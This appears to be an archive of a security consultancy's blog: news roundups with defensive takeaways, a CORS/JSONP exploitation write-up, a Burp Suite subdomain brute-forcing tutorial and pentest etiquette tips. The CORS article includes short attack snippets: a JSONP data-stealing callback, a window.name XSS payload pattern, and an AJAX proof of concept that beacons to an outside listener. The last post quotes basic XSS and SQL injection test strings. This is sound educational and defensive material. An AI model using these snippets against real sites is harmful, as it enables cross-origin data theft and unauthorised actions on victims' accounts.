Thursday, March 15, 2018

Cyber Updates - 15th March 2018

Commercial  Disagreement leads to mass TLS certificate revocation

In a somewhat baffling story, 23,000 certificates sold by certificate reseller Trustico were suddenly revoked. It appears that Trustico wanted to move their customers to new certificates and saw this as a quick way of doing so.

Trustico requested that Digicert, the certificate issuer, revoke 50,000 certificates, citing some unspecified compromise. DigiCert refused without evidence of compromise so Trustico effectively created a compromise by emailing 23,000 private keys to DigiCert. At this point, DigiCert had no alternative under Certificate Authority rules other than to revoke these certificates meaning that visitors to these sites would potentially start receiving secure connection errors within 24 hours.

Key takeaways:

  • It is important to monitor the trustworthiness of your certificate provider. Let's Encrypt is a well respected, free and easy to automate certificate provider.
  • Never allow a certificate provider to generate or get access to your private key. You should always generate a Certificate Signing Request (CSR) and send that to the provider, see example instructions here.

Crypto-mining malware on UK and US government sites

Scott Helme, a UK based security researcher, discovered that various UK government sites were serving up JavaScript which used the browser to mine cryptocurrency, therefore causing significant CPU utilisation for the the end user. Further investigation indicated that a 3rd party called BrowseAloud who provide a script to read website content for blind/partially sited people, had been compromised. Their script had been altered to insert this crypto-mining script meaning that any site using their script would be infected by this.

Key takeaways:

  • If enterprises or consumers use anti-malware protection on web browsing, it would hopefully detect and block this script.
  • Web Site administrators can use Sub-Resource Integrity to monitor and block unexpected script changes.

Record DDoS attacks using memcached

A number of record-breaking DDoS attacks were seen in the last few weeks which utilised a service called memcached as an amplification vector. This occurs because when an attacker sends packets with a source spoofed to be the target's IP address to this particular service, it responds with a much larger response than the initial request leading to an amplification of up to 51,000x the size of the original request.

One high-profile victim was GitHub although they were able to continue operations with minimal disruption with help from their DDoS protection provider.

Key takeaways:

  • DDoS is a scenario you have to plan for in advance, if you don't have a plan by the time it starts, it is likely to take you offline.
  • DDoS protection for such a large attack will require the assistance of your upstream Internet provider and potentially a specialist service.
  • Comsec offers a DDoS readiness service where you can assess the ability of your systems to withstand this type of attack.


Josh Grossman
Senior Information Security Consultant and Team Leader
joshg@comsecglobal.com

Tuesday, February 6, 2018

Cyber Updates - 6th February 2018

CPU vulnerabilities revealed 

After several days of intense speculation, an embargo was lifted on the disclosure of two classes of processor vulnerabilities, dubbed "Meltdown" (affecting Intel specifically) and "Spectre" (affecting multiple processor manufacturers). These vulnerabilities allow one process to read sensitive data from another process including passwords, session tokens and more. Three of the discovers presented a talk on the vulnerabilities at the BlueHatIL conference here in Israel a few weeks ago. 

As the vulnerabilities reside in the processors themselves, for now all that can be done is to apply patches to mitigate the issues however this process has not proceeded smoothly with Microsoft having to hold off on deploying patches until users updated their anti-virus software and culminating in Intel advising users to stop applying their patches until further notice.

Key takeaways:

  • Apply patches based on vendor advice and be sure to test patches in a staging environment before a mass deployment to production systems. This should be standard practice in any case.
  • These vulnerabilities have gathered a large amount of attention due to their branding and novelty although the CVSS scores of the vulnerabilities are a modest 5.6 due to the need to execute code locally. As such, this should be taken into account when prioritising efforts and there may be more serious issues which should be addressed first (see other items in this post).
  • If you are using antivirus software which no longer updates or a system without any antivirus software at all, it may no longer install any Windows updates due to the issue with antivirus noted above!

Remotely exploitable Cisco vulnerabilities

A much more serious vulnerability was reported in Cisco ASA and Firepower edge devices which could allow a remote authenticated, attacker to execute code on the devices. As these devices are designed to be exposed to the Internet, this merited a CVSS score of 10. As with the previous story, patching was not straightforward with Cisco having to issue an updated patch as the first patch was incomplete as well as complaints that it took Cisco too long to inform customers.

Key takeaways:

  • This issue should be patched as soon as possible on all affected edge devices. 
  • All security controls should be considered to be layers and it would be a worthwhile exercise to consider what would happen if certain controls, e.g. use of network edge protection, were suddenly disabled or bypassed.

Further Weaponisation of MS17-010 vulnerabilities

We have previously spoken about the increased risks of vulnerabilities of easily available exploits. We therefore wanted to highlight the news that a security researcher has ported some of the NSA exploits (EternalRomance/EternalSynergy/EternalChampion) which previously worked on certain Windows versions to run on any version since Windows 2000. These

Key takeaways:

  • If you have any version of Windows (server or desktop) from Windows 2000 onwards and it has not been patched with MS17-010, it can be remotely compromised wherever SMB is enabled.
  • Whilst it appears that MS17-010 can potentially be applied to Windows Server 2003 and Windows XP, it appears that Windows Server 2000 is not patchable.

The potential dangers of package managers  

A well written blog post called "I’m harvesting credit card numbers and passwords from your site. Here’s how." went viral a few weeks back which explained how it is possible to exploit the reliance on package managers in software development to insert malicious code into an application.

Liran Tal wrote an interesting rebuttal to the post where he points out that the premise of the post relies on blindly adding packages without consideration.

Key takeaways:

  • Clearly the scenario in the original post is possible although, as Liran says, this is more of an issue of developer awareness and due diligence with open source code.
  • R&D teams should be aware of the risk and have an inventory of what code libraries they are using and how they can verify where they have come from.



Josh Grossman
Senior Information Security Consultant and Team Leader
joshg@comsecglobal.com

Tuesday, January 2, 2018

Cyber Updates - 2nd January 2018

Breach at PayPal subsidiary

PayPal disclosed at the start of December that the personal information of 1.6 million individuals may have been exposed when a subsidiary, TIO Networks which had been acquired in July 2017, was breached. It is not clear whether the breach occurred before or after the acquisition but TIO's systems had not yet been integrated into PayPal’s environment which was therefore not at risk. TIO had already suspended operations in November 2017.

Key takeaways:

  • Acquisitions are very and can expose a well-controlled technology environment to new and unknown security risks if the new subsidiary's network is less well controlled.
  • Security due diligence should be part of the pre-acquisition process and the new environment should be carefully reviewed before integration into the main environment (as appears to have happened in this case).

Serious Privilege Escalation bug in macOS

A very serious security flaw was discovered in High Sierra, the latest macOS. Specifically, if a user tried to authenticate as root (highest privileged user) with a blank password in certain situations, the first time it would not accept it but would silently set the root password to blank and therefore the second time it would allow the user to login as root. Apple subsequently release a patch to address this. A detailed technical write-up of this is here.

Key takeaways:

  • It is important to keep on top of patch management at all levels of the business including endpoints.
  • All security controls should be considered to be layers and it would be a worthwhile exercise to consider what would happen if certain controls, e.g. use of low privilege endpoint users, were suddenly disabled or bypassed.

Top Secret data left exposed in Amazon S3 buckets

A couple of examples recently of top secret US Department of Defense materials (including an entire virtual machine image) being found in unsecured Amazon S3 (Simple Storage Service) locations allowing anyone on the Internet who discovered the locations to download them.

Key takeaways:

  • Use of cloud services is becoming ubiquitous but each cloud service needs someone who is skilled with using the service to act as "security administrator" to ensure these types of error do not occur.
  • Part of this should be frequent technical audits of the cloud environment to look for security issues or misconfigurations.

Critical Vulnerability in Keeper password manager 

Tavis Ormandy discovered a critical flaw in the Keeper password manager (which comes bundled with Windows 10) which could allow an attacker to gain access to passwords stored using the tool. Whilst this was not a good situation, Keeper managed to make it worse by suing a news organisation which reported on it therefore guaranteeing themselves a flood of negative publicity in the Information Security world.

Key takeaways:

  • Whilst having a critical vulnerability reported in your software is not ideal, if reported responsibly then you have effectively received valuable assistance for free.
  • Be wary of the "Streisand Effect" when responding to any actual or perceived issue.

Bonus link - Empathy in Incident Response 

I wanted to put in this excellent blogpost from Tracy Z. Maleeff (@InfoSecSherpa) as well as it talks about a very important concept. If the security team wants users to help them and give them warning when something has happened, it is important that the user doesn’t feel scared to do so.



Josh Grossman
Senior Information Security Consultant and Team Leader
joshg@comsecglobal.com

Thursday, November 23, 2017

Cyber Updates - 23rd November 2017

Final Release of the new OWASP Top 10

The final version of the OWASP Top 10 2017 has now been released. Following a controversial RC1 release, the project underwent a significant overhaul in the past six months including a change of leadership and a move to a fully transparent methodology based on data received and community feedback. The final release removes CSRF and Unvalidated Redirects, merges two previous categories into Broken Access Control and introduces three new categories, XML External Entities, "Insecure Deserialization" and Insufficient Logging and Monitoring.

Key takeaways:

  • Many different standards and frameworks reference the OWASP Top 10 or require companies to demonstrate that they are addressing the risks which it includes. It is important that application security teams understand the new risks which have been added including how to test for them and how to develop applications which are protected against them.
  • It is also important to remember that this is just a condensed list and that a full application security program needs to consider the full spectrum of potential application security issues.


Uber Reveals Data Breach of 57 million records

Bloomberg broke a story this week that in 2016 Uber had paid hackers to delete and not disclose 57 million records which had been stolen in a data breach. The data included names, email addresses and phone numbers for 50m Uber users and data on 7m drivers including US driving licence details. Uber themselves claim that they had a legal obligation to disclose but did not.

Key takeaways:

  • One of the key concerns in this case is that Uber did not disclose when they were legally (and ethically) obligated to do so. These should be key considerations when a data breach is discovered.
  • Another key concern is that Uber effectively paid a "ransom" to the hackers despite potentially having no way of verifying that the data had been deleted and would not be used. As well as potentially also being illegal, this is generally a poor approach to dealing with a situation of this kind.

Serious Intel CPU Vulnerabilities Disclosed

Following some speculation and based on findings from external researchers, Intel released a security advisory detailing significant security vulnerabilities in a number of its CPUs used in desktops, servers and "Internet of Things" devices. The vulnerabilities could allow an attacker to remotely take control of affected machines and access privileged data. This is particularly serious because the vulnerability is in the CPU itself and is therefore completely separate to the main PC operating system.

Key takeaways:

  • IT organisations should start reviewing their IT assets for this vulnerability and work with the relevant system manufacturer (e.g. Dell, Lenovo, HP, etc) to receive and apply updated firmware.
  • Defense in depth measures such as network segmentation and endpoint isolation should always be in place to mitigate the effect of a vulnerability of this sort.

From XSS to RCE, Hidden uses of JavaScript 

We are starting to see applications written using "Electron", a technology which utilises node.js to allow writing desktop applications as if they were web applications (HTML, CSS and JavaScript). A Swiss security researcher published an article detailing how he found a Cross-site Scripting (CSS) vulnerability in Github's atom text editor and was able to escalate this to Remote Code Execution due to the use of Electron.

Key takeaways:

  • Application developers should fully understand the implications of adopting new technologies and frameworks.
  • Less mature frameworks will have less available security information and therefore careful security testing should be performed before deployment.

Josh Grossman
Senior Information Security Consultant and Team Leader
joshg@comsecglobal.com

Monday, November 20, 2017

About (Weird) CORS Exploitations

During our daily routine, we face lots of different kinds of web applications, which are built differently from one another. Sometimes the developers have the need to pass information from one subdomain to another, or generally between different domains. This need might be for rendering purposes or for crucial functionality such as passing access tokens and session identifiers to another cooperative application.

As you may know, the browsers do not allow AJAX requests to be sent from one domain (or subdomain) to another for security reasons, the security policy is called Same Origin Policy (SOP).

So in order to allow cross-domain communication, the developers had to use different “hacks” to bypass SOP and pass this allegedly “sensitive information”, until Cross-Origin Resource Sharing (CORS) came in to the picture and changed the whole game.

This article sums up an extreme case of CORS misconfiguration that led me to exploit the application’s vulnerable configuration a little bit differently from what I expected.

Chapter A - The (OLD) problem:
The most common method was the use of JSONP, which will be discussed later in this article, and some JavaScript tricks such as using DOM-based objects to store information in them.

JSONP works with specific server endpoints, and retrieves user-related information from them using the user’s session, and a callback that needs to be handled on the client side. Every callback should be wrapped with a padding function (therefore, the P for JSONP). For example:

Victim application runs on domain-A, and publishes a server endpoint called “getUsers”. Note that the callback “users” also determines the name of the padding function:

The callback would be: users({“userA”:”John”,”userB”:”Smith”})

This scenario is extremely vulnerable, since domain-b.com only has to load this endpoint in his site and expect the victim to visit the site. When this happens, an HTTP GET request is sent to domain-a.com along with the victim’s cookie (similar to classic CSRF), and the callback is then returned to domain-b to handle. For example:

function users(json) {
callbackStealer(json.userA);
 }

More information about JSONP can be found over here: https://www.sitepoint.com/jsonp-examples/

Additionally, JavaScript tricks that were used by developers could also leave the site extremely vulnerable to DOM-based XSS attacks. For example:
domain-a might use window.name object to store information, and redirect the tab to domain-b (window.location = "domain-b"). Eventually domain-b will eval() the information stored in window.name.

How can we exploit it? It’s simple:
Our attacking domain (domain-c) should store the XSS payload in window.name
<script> window.name = “some AJAX-based payload to perform a critical action in the targeted application”;
window.location = “http://domain-b.com”; // Remember? This domain should eval(window.name); by design

And since domain-b is executing the code which is stored in window.name, we were able to totally pwn the application, by using a third-party malicious site of our own.

But today, you won’t see this happens much. So you can just use this method to exploit an XSS you already found.

Chapter B - The (NEW) problem:
Later on, HTML5 technology brought a game changing feature called Cross-site Resource Sharing (CORS). This new policy allows the developers to determine which domains are allowed to communicate with their application’s domain, and therefore no hacks are needed – but education and security awareness are!

Frameworks that have the ability to use CORS, used to have an “out of the box configuration”, we'll see some examples below.

The 1st wave of CORS policy taught the browser how to behave and allow two-way interaction between domains & subdomains. This policy tells the browser (using HTTP headers in the server’s response) if he can or cannot interact with the current domain from a different domain.

Some frameworks work with a default configuration that actually takes the origin of the request and automatically allows it by sending the origin back in the response headers. For example:

Request (note the origin was changed to evil.com):


Response:



So much for CORS huh..?
Note that Allow-Credentials: true allows XMLHTTPRequests (XHRs) to send the victim’s cookie from ANY domain. That’s a JavaScript-based CSRF, which is far more "smarter" than the HTML-based version.

But people learned… And hardened their CORS policy. Plus, modern browsers don't even send the HTTP request before it gets an answer for the pre-flight request which looks like this:




In my extreme case, every server endpoint was hardened with a secured CORS policy and didn’t allow any domain to interact with it… Meaning, it wouldn't show the response to the browser which executed the JS code. example:






BUT (!) the pre-flight request was not secured (See example for such configuration in the above OPTIONS request). This means that the browser will allow us to send a request to the targeted domain but not read the response.

Therefore we cannot acquire additional information such as anti-CSRF tokens on nonce values, but we still have an upgraded CSRF that support different HTTP verbs and headers (depending on the response from the pre-flight request).

TIP: we can indicate whether someone executed our script or not by adding a call to our web listener. For example:

$.ajax({some_action_in_the_targeted_application}); new Image().src = "http://web.listener.com?q=somebody just fell in your trap!";

Simple AJAX for Proof of Concept, and you can possibly delete the admin account of the app, change his accounts settings … whatever.

In conclusion,
Remember to always test every endpoint, including the pre-flight request by changing the origin to an arbitrary domain, and ensure that the site is not vulnerable.

Good Luck !

Rotem Tsadok
Head of Offensive Security & Response Unit  

Tuesday, November 14, 2017

ComTech: Using Burp Suite to Discover Domains

Introduction

There are many reasons why you may want to use a brute-force method to discover web domains or sub-domains, for example reconnaissance or attack surface discovery.

Whilst Burp Suite can discover content in folders below a domain using a brute-force approach (see: here), it cannot use this approach to find domains.

Burp Intruder would be a possible tool for this (assuming you are looking for web sites) except that you have to specifically choose the target domain on the first tab so it cannot be chosen as a payload position which could then be brute-forced by Intruder. Once I realised this, I started thinking how I could use Burp's features to enable this. I have set out the solution below. Note that this assumes you are already familiar with how Burp Suite works and it will only work with Burp Suite Pro.


Invisible Proxying

The answer is to create an invisible proxy in Burp. Invisible proxy is a way in which Burp handles client applications which cannot be specifically configured to use a proxy. As explained here https://portswigger.net/burp/help/proxy_options_invisible, applications which can be configured to use a proxy will send a full URL to the proxy so that the proxy knows where to send the request on to. An application, which cannot be configured to use a proxy will just include the URL in the path but not the domain itself.

Invisible proxy mode effectively means that Burp will decide on the target location to send the request based on the host header in the HTTP request. Now, the host header can be selected as a payload position in intruder and we can therefore fuzz that.


Configuring Burp Suite


Setting up the proxy

The first thing I have to do is setup a new proxy listener in Burp. In this case I have it listening on port 443 although actually you could choose any available port. The important thing here is that I have selected the invisible proxy option.



Setting up Intruder

I have already sent a standard GET request to intruder. I now go to the target tab and for the target I choose localhost and the port where I have got my invisible proxy listening, in this case 443.


I can see the standard GET request which I sent in the Positions tab and I can now select the part of the domain in the host header which I want to attack, II have just chosen one payload position but obviously I could choose multiple positions if I wanted attempt multiple types. You could also add a port onto the host header and choose that as a payload if you wanted to attempt multiple port types.


The rest is the same as a standard Intruder attack, in my case I have chosen a character brute-force payload but you will probably want to use a predefined list of likely domains.


Executing the attack


Intruder will give you an error about the target and host header not matching but you can ignore that


Reviewing the results


You can now go through the intruder results to look at what was returned.


Interestingly, because you are looping back through Burp's proxy, you will also see the requests that were sent in the proxy history list.


I hope this little trick is useful. If you have any comments, critiques or suggestions, you can contact me using the details below.


Josh Grossman
Senior Information Security Consultant and Team Leader
joshg@comsecglobal.com

Sunday, September 17, 2017

ComTech: Do's and Don'ts in production environment pentest

Hello everyone
After a short break, ComTech is back.

Today's post will talk about something that is relevant to every pentest, the do's and the don'ts of pentesting a production environments.
Let's start:
  • Don't use or use a little as possible automated scanners.
    In application PT - use non, do all manual. In infrastructure PT - use only the most needed ones. The automated scanners that should be avoided include vulnerability scanners (Nessus, OpenVas in infra PT, Burp pro scanner, Acunetix in app PT).
  • Perform as much of the test manually.
  • Especially don't use any tools in OT environment (industrial control system, SCADA). These environments are especially sensitive, and a simple port scan might crash them altogether. 
  • If you do need to use tools in infra PT, make sure you mark the "safe checks" checkbox if exist (Nessus, OpenVas).
  • Don't use payloads that can cause any damange. This include innocent looking payloads such as the classic XSS and SQLI <script>alert('xss')</script> and ' or 1=1-- in app PT.
    The first might pop up a message in a production page in a persistent XSS, that would cause embarrassment to the client, and the second, if done in the wrong place, could delete all of the records in a table (if injected to a delete command), or issue a fetch command that would get all of the records and might bring the system down.
  • Always clean up after yourself, and do the best effort to delete any testing records and data, especially any data stored in a persistent storage (DB).
  • In infra PT (and also relevant to app PT) don't send a large input to a tested interface, as it might also cause the system to crash.
  • If money is involved, always ask the client for QA credit cards. Avoid using your own credit card in PTs. 
  • Don't change any configuration in an admin interface or CMS, unless explicitly permitted by the client.
  • Open and use your test emails to make sure you won't get spammed long after the test is over.
  • Don't do online login brute-force attack without permissions, as it might lockout production users.
  • If you are testing a hosted cloud-based system, always make sure you have the appropriate permissions to do so, and that the cloud provider is aware and approves it.
  • In spite of what is written above, always talk to the client and match expectations. There might be specific production environments that you could do the don'ts mentioned above.
Stay safe



Gil Cohen
CTO